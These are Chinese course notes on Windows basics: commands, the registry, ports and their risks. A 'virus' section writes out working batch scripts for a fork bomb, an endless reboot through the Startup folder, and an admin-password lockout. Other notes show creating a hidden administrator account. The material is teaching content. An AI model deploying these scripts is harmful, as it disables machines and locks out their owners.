admin 管理员组

文章数量: 887500

声明:学习视频来自b站up主 泷羽sec,如涉及侵权马上删除文章

声明:本文主要用作技术分享,所有内容仅供参考。任何使用或依赖于本文信息所造成的法律后果均与本人无关。请读者自行判断风险,并遵循相关法律法规。

感谢泷羽sec 团队的教学
视频地址:linux基础之病毒编写(完结)_哔哩哔哩_bilibili

windows基础 1

1024 B = 1 KB ; 1024 KB = 1 MB ; 1024 MB = 1 GB

1.cmd直接加help直接看到所有的命令 自己在虚拟机学命令

2.PowerShell 是一种跨平台的任务自动化和配置管理框架,最初由微软开发并主要用于 Windows 环境。它结合了命令行界面和脚本语言功能,可以帮助用户执行系统管理任务和自动化流程。

3 windows有各种盘,linux都是文件没有c盘

3.wsl

wsl是什么呢?wsl是windows subsystem for linux的简写,指的是windows10的一个子系统,这个子系统的作用是在windows下运行linux操作系统。

当然一旦运行linux操作系统,适用于linux的所有应用软件就都可以在其中运行,这样从使用者的角度看,似乎在windows上就可以运行本来只能在liunx下运行的各种软件和应用程序了。

有了wsl,就可以在windows10中运行linux操作系统了。

那么这么看来,似乎wsl就是一个windows10自带的虚拟机软件(比如virtualbox、vmware workstation等),他们到底一样不一样呢?事实上,wsl和虚拟机软件并不一样。

wsl和虚拟机只不过从表面上看起来是有点类似,在虚拟机中可以装linux操作系统,在wsl中也可以安装linux操作系统,比如ubuntu、centos等都可以安装,在虚拟机中安装linux后就可以运行linux上的典型软件了,比如vi、wget等命令行软件,在wsl中安装linux系统后,也可以运行这些linux中的应用软件,所以说,在从使用者的角度看、从表面上看,wsl和虚拟机软件是类似的。

可是,wsl和虚拟机软件的不同点在哪里呢?事实上,wsl底层实现上和虚拟机软件(比如virtual box,vmware workstation等)是不一样的,wsl运行linux的资源开销没有在虚拟机软件中运行linux的资源开销大。

wsl安装方法是和它的版本有关系,不同的版本安装方法稍有不同。目前wsl分为两个版本,1.0和2.0,WSL2 是 WSL1 的升级版,wsl1是将linux的syscall转成windows的系统调用,从而在windows上面搞出了一层linux兼容层,linux应用软件等都是运行在这个兼容层之上,wsl2底层还是基于hyperV的虚拟机的。

window常用命令

1. copy    move    reg
​
2. 目录相当于文件夹,有绝对路径和相对路径
​
3. 使用ascll字符,而不使用拓展字符   什么意思 

拓展字符也就是扩展ASCII字符集(也称为扩展ASCII或8位ASCII)通常指的是编号128到255的字符。这些字符并不是标准ASCII的一部分,而是后来为了包含更多符号、特殊字符和外国语言的字母而添加的。不同的系统和编码标准可能会有不同的扩展ASCII字符集。

  1. sql注入字典

  2. 用户名爆破

  3. 注册表(Registry)是微软Windows操作系统中一个重要的数据库,用于存储系统、软件程序以及硬件设备的配置和设置信息。注册表在Windows操作系统中扮演着核心的角色,因为它包含了操作系统运行时需要的大量配置信息。

    注册表中的数据被组织成“键”(Keys)、“子键”(Subkeys)和“值”(Values):

    1. 键(Keys):类似于文件夹,是注册表中的主要分类,用于组织和存储信息。例如,HKEY_LOCAL_MACHINE 是一个顶级键,它包含了计算机上所有用户的配置信息。

    2. 子键(Subkeys):类似于子文件夹,是键的分支,用于进一步细分信息。

    3. 值(Values):是实际存储的数据,每个值都有一个名称和一个数据类型(如字符串、数字等)。

    注册表的主要功能包括:

    • 存储系统设置和配置信息,如文件关联、启动程序、系统策略等。

    • 存储硬件设备的配置信息,如驱动程序信息。

    • 存储应用程序的配置信息,如用户设置、安装路径等。

    • 提供操作系统和应用程序运行时需要的配置信息。

用户和管理员可以通过注册表编辑器(如 regedit)来查看和修改注册表。但是,不正确的修改可能会导致系统不稳定或无法启动,因此建议在修改注册表之前备份当前的注册表数据,并且只有在了解修改后果的情况下才进行操作。 由于注册表对系统的运行至关重要,恶意软件有时也会修改注册表来隐藏自己或破坏系统,这也是为什么需要定期进行系统维护和安全检查的原因之一。

 7. 关闭用户会话通常意味着结束用户与系统、应用程序或网站的当前交互过程。这个操作会带来一系列的效果和变化,具体取决于会话的上下文和类型。以下是一些可能发生的情况:

Web 应用

    1. **状态丢失**:用户在会话期间进行的操作和状态(如填写的表单数据、浏览历史、购物车内容等)可能会丢失,除非这些信息已经被保存到服务器或本地存储中。
    2. **重新登录**:如果用户在会话中登录了个人账户,关闭会话通常意味着用户需要重新登录才能继续访问需要认证的功能。
    3. **安全性增强**:结束会话可以减少会话劫持和跨站脚本攻击(XSS)等安全风险,因为用户的会话ID不再有效。
    4. **资源释放**:服务器端为该用户会话分配的资源(如内存、数据库连接等)会被释放,有助于提高服务器的性能和可用性。

桌面或移动应用

    1. **应用关闭**:在桌面或移动应用中,关闭用户会话通常意味着关闭应用。用户可能需要重新启动应用来继续使用。
   2. **数据保存提示**:应用可能会提示用户保存未保存的工作,或者自动保存当前状态,以便用户下次打开应用时可以继续之前的操作。
   3. **资源释放**:应用占用的系统资源(如内存、处理器时间等)会被释放,有助于提高设备的性能。
 
### 数据库会话
 
   1. **事务结束**:如果用户在数据库会话中执行了事务操作,关闭会话可能会导致未提交的事务被回滚。
   2. **连接释放**:数据库连接会被关闭,释放服务器资源。
 
   ### 网络会话
 
   1. **连接终止**:在网络会话中,关闭会话意味着断开当前的网络连接。
   2. **数据传输停止**:任何正在进行的数据传输都会被中断。
 
   ### 通用影响
 
   - **会话数据清除**:无论是哪种类型的会话,关闭通常意味着会话相关的临时数据会被清除。
 
   - **用户提示**:系统可能会向用户显示提示或确认消息,告知会话已结束。
 
     8. Apache Tomcat 是一种服务器
 
     9. 当然,ARP(Address Resolution Protocol)是一个网络协议,它的主要任务是在局域网(LAN)中将网络层的IP地址转换为链路层的MAC地址。
 
        简单来说,当你在电脑上尝试访问另一台设备(比如另一台电脑或者打印机)时,你的设备知道对方的IP地址,但实际在局域网中传输数据时需要使用MAC地址。ARP就是用来找出对应IP地址的MAC地址的协议。

windows基础 2     

一、windows和Linux 文件系统 linux:fhs目录结构,块设备挂载到目录(一切都是文件) windows:以驱动器盘符起始,或通过目录挂载分区 路径格式 linux: /开始,区分大小写(左斜线) windows:\分隔路径,不区分大小写(右斜线) 系统配置 linux:etc/和/proc(存储在信息目录) windows:注册表(存储信息在注册表里) windows四种shell接口 1、GUI图形化用户接口,操作简单 2、cmd命令行用户接口,包含一组预定义命令 3、wmic微软基于wbem的实现,从21h1版本已经弃用,被powershell替代了 4、powershell自动化脚本框架,支持架构 WSL Windows Subsystem for Linux,是Windows的一项功能在win上运行的Linx子系统

二、windows 30条常用命令

序号 命令 功能描述 事例 参数应用

  1. dir:默认情况下,连续显示所有文件和目录,不会暂停。

  2. dir /P:显示文件和目录列表时,每页显示完毕后会暂停,等待用户按键后继续显示下一页。

dir /s 显示指定目录及所有子目录中的文件

cd 切换目录 cd \ 切换到根目录 cd.. 返回到上一层目录 cd D: 切换到D盘根目录 cd /d D:\word 切换到D:\word目录(跨盘符时使用/d参数) 3 md(或mkdir) 创建一个新的目录 md newfolder 在当前目录下创建名为“newfolder”的新目录 mkdir D:\photos 在D盘的根目录下创建名为“photos”的新目录 4 rd 删除一个空目录 rd NewFolder 删除名为“NewFolder”的空目录 注意:rd命令不能删除非空目录,可使用rmdir /s /q命令删除非空目录

5 copy 复制文件

copy file.txt C:\Backup\ 将“file.txt”复制到“C:\Backup\”目录下

copy 3.txt ..\4.txt .txt文件复制到上一级目录,并将其重命名为4.txt。 copy 2.txt Desktop\3.txt 不对 要写成copy E:\b\2.txt C:\Users\你的用户名\Desktop\3.txt 寻找桌面位置用 echo %USERPROFILE%\Desktop %USERPROFILE% 指向 `C:\Users\John

6 del

删除一个或多个文件 del file.txt 删除名为“file.txt”的文件

del /f filename 强制删除只读文件 del /s *.txt 删除当前目录及所有子目录中的“.txt”文件

7 move 移动文件或重命名文件 move file.txt C:\NewLocation\ 将“file.txt”移动到“C:\NewLocation\”目录下

move /y file.txt C:\NewLocation\newname.txt 移动并重命名文件,覆盖目标文件而不提示确认 move /y d:\test\ d:\example\ 重命名目录(在同一盘符下) 8 xcopy 复制文件和目录树 xcopy C:\source* D:\destination\ /s /e /i 复制source目录下的所有文件和子目录到destination 9 ver 显示当前操作系统的版本 ver 无参数,直接显示版本信息 10 systeminfo 显示系统信息 systeminfo 无参数,显示关于计算机及其操作系统的详细信息 11 ipconfig 显示当前的网络配置信息 ipconfig 无参数,显示IP地址、子网掩码和默认网关 ipconfig /all 显示完整的TCP/IP配置信息 12 ping 测试网络连接 ping www.google 检查与Google服务器的连接 ping -t www.google 不断发送ping包,直到被用户中断 ping -n 5 www.google 发送5个ping包后停止

13 tasklist

列出当前运行的所有进程 tasklist 无参数,显示所有当前运行的任务 tasklist /FI "IMAGENAME eq notepad.exe" MAGENAME 是筛选器中的一个条件,用于指定进程的映像名称,即进程的可执行文件名。eq 是一个关系运算符,代表“等于”(equal to)。 列出所有映像名称(即进程名)等于 notepad.exe 的进程。

tasklist /svc 显示每个进程的服务信息 14 shutdown 关闭或重启计算机

shutdown /s /t 60 设置计算机在60秒后关机 shutdown /r /t 30 30秒后重新启动计算机 shutdown /l /f 强制注销当前用户 /s:关闭计算机。 /r:重启计算机。 /l:注销当前用户。 /h:将计算机置于休眠状态。 /t [秒数]:设置延时执行关机或重启,单位为秒(默认为 30 秒,最大值为 315360000 秒)。 /a:取消正在执行的关机倒计时。 /f:强制关闭应用程序而不警告用户。 /m \计算机名:远程关闭或重启指定计算机(需要管理员权限)。 /c “注释”:在关机消息中添加注释(最多 512 个字符)。 /g:关闭计算机并重新启动所有注册的应用程序,如果你想要在重启后恢复工作环境并自动启动应用,可以使用 /g 参数。

15 cls 清除屏幕 cls 无参数,清除命令提示符窗口的内容

16 echo

在命令行中显示信息或输出文件 echo Hello World 显示文本“Hello World”

echo Hello > file.txt 将文本“Hello”写入file.txt文件 如果没有file文件 echo 会自动创造出来 17 tree 以树状结构显示目录内容 tree 显示当前目录及其子目录的树状结构 tree /f 显示每个文件的完整路径 tree /a 显示所有文件和目录,包括隐藏文件 如果/f出现乱码则需要使用/a

  • dir:默认情况下,连续显示所有文件和目录,不会暂停。

  • dir /P:显示文件和目录列表时,每页显示完毕后会暂停,等待用户按键后继续显示下一页。

语法: tree drive: [/F] [/A]18 drive:][path]:这是可选参数,指定了你想要查看的目录的驱动器和路径。如果省略,tree 命令将显示当前目录的结构。

也可以 直接打出tree

21 ren(或rename) 重命名文件或目录 ren oldname.txt newname.txt 将“oldname.txt”重命名为“newname.txt” rename foldername newfoldername 将目录“foldername”重命名为“newfoldername” 19 type 显示文本文件的内容 type file.txt 显示“file.txt”文件的内容 type *.txt 显示当前目录下所有“.txt”文件的内容 20 reg(注册表相关命令,通常与add、delete、query、export、import等子命令一起使用) 访问和修改Windows注册表 reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" 查询注册表项 reg add "HKCU\Software\NewKey" /v NewValue /t REG_SZ /d "Data" /f 添加注册表项 21 nslookup 查询DNS记录以获取域名或IP地址的信息 nslookup www.example 查询“http://www.example”的DNS记录

22 find

在文件中搜索字符串 find "searchtext" file.txt 在“file.txt”中搜索包含“searchtext”的行

find /i "searchtext" *.txt 在所有“.txt”文件中不区分大小写地搜索“searchtext”

type 1.txt | find "a"

|:这是管道符,它将前一个命令的输出作为后一个命令的输入

23 taskkill 结束一个或多个进程 taskkill /F /IM notepad.exe 强制结束“notepad.exe”进程 taskkill /PID 1234 /F 根据进程ID(PID)强制结束进程 24 start 启动一个程序、命令或脚本 start notepad.exe 启动记事本程序 start "" "C:\Program Files\MyApp\app.exe" 启动指定路径下的应用程序(注意双引号的使用) 25 logoff 注销当前用户会话 logoff 注销当前用户 26 telnet 通过Telnet协议连接到远程计算机 telnet remotehost 80 通过Telnet连接到远程主机(remotehost)的80端口 注意:Windows 10及更高版本的家庭版默认不包含Telnet客户端,需通过控制面板启用或安装 27 arp 显示和修改IP地址到物理地址的转换表(ARP缓存) arp -a 显示ARP缓存中的所有条目 arp -d * 删除ARP缓存中的所有条目

29 net

net 命令是 Windows 操作系统中用于管理网络服务和用户账户的命令行工具。它提供了一系列的子命令,用于执行各种网络相关的操作。以下是一些常用的 net 命令及其用途:

  1. 用户账户管理

    • net user:添加、删除或修改用户账户。

    • net localgroup:添加或删除本地组的成员。

    • net group:添加、删除或修改本地组。

  2. 网络服务管理

    • net start:启动服务。

    • net stop:停止服务。

    • net use:连接或断开网络驱动器。

    • net session:查看或断开会话。

  3. 网络配置

    • net view:查看网络资源。

    • net config:显示或修改系统网络配置。

    • netstat:显示活动的 TCP 连接、端口和侦听端口。

  4. 网络诊断

    • netdiag:诊断网络连接问题。

    • netsh:一个更强大的网络配置命令行工具。

  5. 文件和打印服务

    • net share:添加、删除或查看共享资源。

    • net print:显示或管理打印队列。

  6. 登录脚本和登录选项

    • net logoff:断开用户会话。

    • net time:查看或设置计算机时间。

  7. 计算机管理

    • net computer:添加或删除计算机。

    • net send:向网络上的其他用户发送消息。

  8. 权限和安全

    • net accounts:查看或修改域的安全策略。

    • net session:查看会话列表。

      cmd同时执行多条命令

      命令1 & 命令2 & 命令3

      这样就会依次执行命令1、命令2、命令3

      start 命令1 & start 命令2 & start 命令3

      这样就会同时启动命令1、命令2、命令3。

系统标准目录 perflogs存储windows性能日志 program files 32位系统,存储32位程序,64位 存储64位程序 program files 64位系统,存储32位版本程序 programdata隐藏目录,包含全局程序数据,所有登录用户都可以访问这些数据 users包含用户主目录(登录过的用户) users\public用户间共享文件,所有用户都有权访问 users[username]\appdata隐藏子目录,存储用户应用数据和设置 windows\system,system32,system64存储动态链接库文件,windows和api核心文件

环境变量

echo %username% 查看当前用户是谁 echo %path% 输出计算机的path环境变量 echo %temp% 输出计算机的临时目录所在路径 echo %userprofile% 输出当前用户的主目录,也就是user目录 set 把环境变量在命令行中输出 set p 查看以p开头的环境变量 setx 永久修改环境变量(可用参数太多可继续研究)

.

.

net命令,很重要,因为net指令可以造成漏洞,也可以写病毒 net start/stop telnet 打开/关闭telnet服务 net user 看当前用户 net user admin 123 /add 添加用户为admin,密码为123的用户 net user admin 查看admin的权限 net localgroup administrators admin /add 把admin用户添加到管理组中,拥有很高的组权限(提权) net user admin /del 删除用户admin net user ad$ /add 创建隐藏用户ad$ net localgroup administrators ad$ /add

net share 查看当前计算机共享文件夹 net share aaa=c:\windows 把c盘windows目录共享,并命名为aaa net share aaa /delete 把aaa共享删除

可以先创建一个账号,然后提权,然后把这个文件共享出来,然后访问目标

三、windows常用端口

一、常见端口及其对应的安全风险 FTP (21):文件传输协议(FTP)通常以明文形式传输数据,包括用户名和密码,因此容易受到网络嗅探攻击。 Telnet (23):Telnet协议也以明文传输数据,没有加密保护,因此同样容易受到网络嗅探攻击。 HTTP (80):超文本传输协议(HTTP)如果不使用加密,数据传输过程中可能受到中间人攻击,如XSS(跨站脚本攻击)和CSRF(跨站请求伪造)。 HTTPS (443):安全超文本传输协议(HTTPS)使用SSL/TLS加密,但如果配置不当,可能会存在漏洞,如心脏滴血(Heartbleed)漏洞。 SMB/CIFS (445):服务器消息块/公共互联网文件系统(SMB/CIFS)协议可能受到勒索软件攻击和未授权访问。 MSSQL (433):微软SQL服务器可能存在弱密码和未授权访问的风险。 Oracle (1521):Oracle数据库可能存在默认弱口令和未授权访问的风险。 cPanel (2082/2083):cPanel主机管理系统如果使用默认凭据,容易被攻击。 DA (2222):虚拟主机管理系统(DA)如果使用默认弱口令,也容易受到攻击。 Squid 代理 (3128):如果未授权访问和配置错误,可能导致信息泄露。 MySQL (3306):MySQL数据库可能存在弱密码和未授权访问的风险。 Kangle (3311/3312):Kangle主机管理系统如果使用默认凭据,容易受到攻击。 RDP (3389):远程桌面协议(RDP)可能面临暴力破解和未授权访问的风险。 PostgreSQL (5432):PostgreSQL数据库可能存在弱密码和未授权访问的风险。 VNC (5900):虚拟网络计算(VNC)如果使用默认凭据,容易受到攻击。 Redis (6379):Redis数据库可能存在数据泄露和未授权执行命令的风险。 WebLogic (7001/7002):WebLogic服务器可能存在默认弱口令和反序列化漏洞,可能导致远程代码执行。 Kloxo (7778):Kloxo主机控制面板登录如果使用默认弱口令,容易受到攻击。 Web管理端口 (8000-9090):常见的Web管理端口可能受到各种Web攻击和未授权访问风险。 Tomcat/WDCP (8080):Tomcat和WDCP主机管理系统如果使用默认凭据,容易受到攻击。 JBoss (8089/9090):JBoss应用服务器可能存在默认弱口令和未授权访问的风险。 VestaCP (8083):VestaCP主机管理系统如果使用默认凭据,容易受到攻击。 Ganglia (8649):Ganglia监控系统可能泄露监控数据,存在未授权访问风险。 宝塔 (8888):宝塔主机管理默认端口如果使用默认弱口令,容易受到攻击。 Virtualmin/Webmin (10000):Virtualmin/Webmin服务器管理系统如果使用默认凭据,容易受到攻击。 Memcache (11211):Memcache数据库可能存在数据泄露和未授权访问的风险。 MongoDB (27017/27018):MongoDB数据库可能存在数据泄露、恶意命令执行和未授权访问的风险。 MongoDB 统计系统页面 (28017):MongoDB统计系统页面可能暴露敏感信息,存在未授权访问风险。

病毒

自启动文件夹路径:"%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

%USERPROFILE% :当前用户的主目录的环境变量

1、资源耗尽病毒

echo start cmd > 1.txt 这行命令的作用是创建一个名为1.txt的文本文件,并在其中写入文本start cmd。

echo %0 >> 1.txt 如果你在批处理文件中使用%0,它会被替换为该批处理文件的完整路径和文件名。

ren 1.txt 1.bat

脚本解释

echo是一个输出命令,用于将内容写入文件或在命令提示符中显示。

start cmd表示启动新的命令行窗口。

echo %0 >> 1.txt 这行命令将批处理文件本身的名称追加到1.txt文件的下一行中。echo %0 >> 1.txt:这条命令会将变量%0的值追加到1.txt文件的末尾。%0在批处理文件中代表批处理文件本身的名称。>>是追加重定向操作符,它会将输出追加到指定的文件末尾,而不是覆盖文件。

>:这个符号叫做“覆盖重定向”操作符。当你在命令后面使用 >,它会将命令的输出重定向到指定的文件中。如果这个文件已经存在,> 操作符会覆盖文件中原有的内容。如果文件不存在,它会被创建。

>>:这个符号叫做“追加重定向”操作符。当你在命令后面使用 >>,它会将命令的输出追加到指定的文件末尾。如果文件不存在,>> 操作符会创建这个文件。

%0代表批处理文件本身的名称。

是追加符,用于将内容追加到文件中,而不是覆盖文件。

ren 1.txt 1.bat 该行代码将1.txt文件重命名为1.bat,生成一个执行的批处理文件。

批处理文件是一种在Windows操作系统中使用的脚本文件,它允许你将一系列的命令写入一个文件中,然后一次性执行这些命令。这种文件通常以.bat.cmd为扩展名。

批处理文件特点:

  1. 自动化:批处理文件可以自动执行一系列命令,无需手动输入每个命令。

  2. 重复使用:你可以创建一个批处理文件来执行经常需要重复的任务。

  3. 易于编写:使用简单的文本编辑器(如记事本)就可以编写批处理文件。

用途:

  • 系统管理:用于自动执行系统维护任务,如备份文件、更新软件等。

  • 文件操作:批量重命名、复制或删除文件。

  • 程序启动:启动一系列程序或脚本。

  • 条件执行:根据条件执行不同的命令序列。

脚本效果就是:当我们双击该1.bat文件时,会自动调出命令行窗口,执行start cmd(启动新的命令行窗口)、1.bat,这里1.bat的效果就是调出命令行窗口,执行start cmd、1.bat命令,如此反复,从而达到无限启动新的命令行窗口效果,占用电脑资源。

具体过程如下:

文件内容:1.bat文件内容是:

start cmd

1.bat 它会依次执行start cmd和1.bat。

梯度执行:当运行1.bat时:

首先,start cmd会打开一个新的命令行窗口。

接下来,在命令行窗口中再次调用1.bat文件。

由于1.bat中包含相同的start cmd和1.bat指令,每次运行都会启动新命令行窗口,并在新命令行窗口中继续执行,形成一个无限递归。

效果:这种无限下降会不断启动新的命令行窗口,导致系统资源(CPU、内存)迅速被消耗,直到系统变得无法响应。

2、无限重启病毒

echo shutdown /r /t 0 > C:\Windows\Temp\1.bat

copy C:\Windows\Temp\1.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

脚本解释

echo shutdown /r /t 0 > C:\Windows\Temp\1.bat 这行命令的作用是在C:\Windows\Temp目录下创建一个名为1.bat的批处理文件,并在其中写入文本shutdown /r /t 0。

echo是一个输出命令,用于将内容写入文件或在命令提示符中显示。

是重定向符,将输出重定向到1.bat文件。

shutdown /r /t 0是立即重新启动计算机的命令。 /r参数表示重启。 /t 0设置重启的延迟为0秒,即立即执行。

####

copy C:\Windows\Temp\1.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" 这行命令将将1.bat文件复制到当前用户的自启动文件夹。

%USERPROFILE% 是一个环境变量,指向当前用户的主目录。

脚本效果就是:当我们双击该1.bat文件时,电脑会立即重启,由于已经将该文件加到了用户自启动目录,因此1.bat文件在每次开机启动时会被执行。由于1.bat文件包含了立即重启命令,系统启动后会立即形成重启,再次触发1.bat,从而无限重启循环。

3、锁机病毒

echo net user administrator 123456 > C:\Windows\Temp\1.bat

echo shutdown /r /t 0 >> C:\Windows\Temp\1.bat

脚本解释

echo net user administrator 123456 > C:\Windows\Temp\1.bat 这行命令的作用是在C:\Windows\Temp目录下创建一个名为1.bat的批处理文件,并在其中写入文本net user administrator 123456。

echo是一个输出命令,用于将内容写入文件或在命令提示符中显示。

net user administrator 123456是修改本地管理员账户 ( administrator) 的密码为123456。

echo shutdown /r /t 0 >> C:\Windows\Temp\1.bat 这行命令的作用是将shutdown /r /t 0 命令加到1.bat批处理文件的下一行中。

echo是一个输出命令,用于将内容写入文件或在命令提示符中显示。

是追加符,用于将内容追加到文件中,而不是覆盖文件。

shutdown /r /t 0是立即重新启动计算机的命令。 /r参数表示重启。 /t 0设置重启的延迟为0秒,即立即执行。

脚本效果就是:当1.bat文件被执行后,本地管理员账户 ( administrator) 的密码会被修改为123456并且计算机会立即进行重启,然而,由于原本密码被修改,导致用户无法使用本地管理员账户登录,从而达到“锁机”效果。

CSV(Comma-Separated Values,逗号分隔值)是一种简单的文件格式,用于存储表格数据,如电子表格或数据库。CSV文件由纯文本组成,其中的数据通常是以逗号分隔的值。这种格式因其简单性和跨平台兼容性而被广泛使用。

CSV文件的基本特点:

  1. 纯文本:CSV文件是纯文本文件,可以使用任何文本编辑器打开和编辑。

  2. 分隔符:数据字段通常由逗号分隔,但也可以使用其他字符,如分号(;)、制表符(\t)或竖线(|)。

  3. :CSV文件的每一行代表数据表中的一行。

  4. 字段:每一行中的每个逗号分隔的值称为一个字段。

  5. 标题:可选的,CSV文件的第一行可以包含标题或列名,描述每一列的数据。

  6. 兼容性:大多数表格处理软件(如Microsoft Excel、LibreOffice Calc、Google Sheets)和数据库软件都能导入和导出CSV文件。

    姓名,年龄,城市
    Alice,30,New York
    Bob,25,Los Angeles
    Charlie,35,Chicago

*如何找电脑的服务器名称也就是计算机名

在命令提示符中输入“hostname”并回车。 这会显示你的电脑的服务器名称。

本文标签: 合集 基础 Windows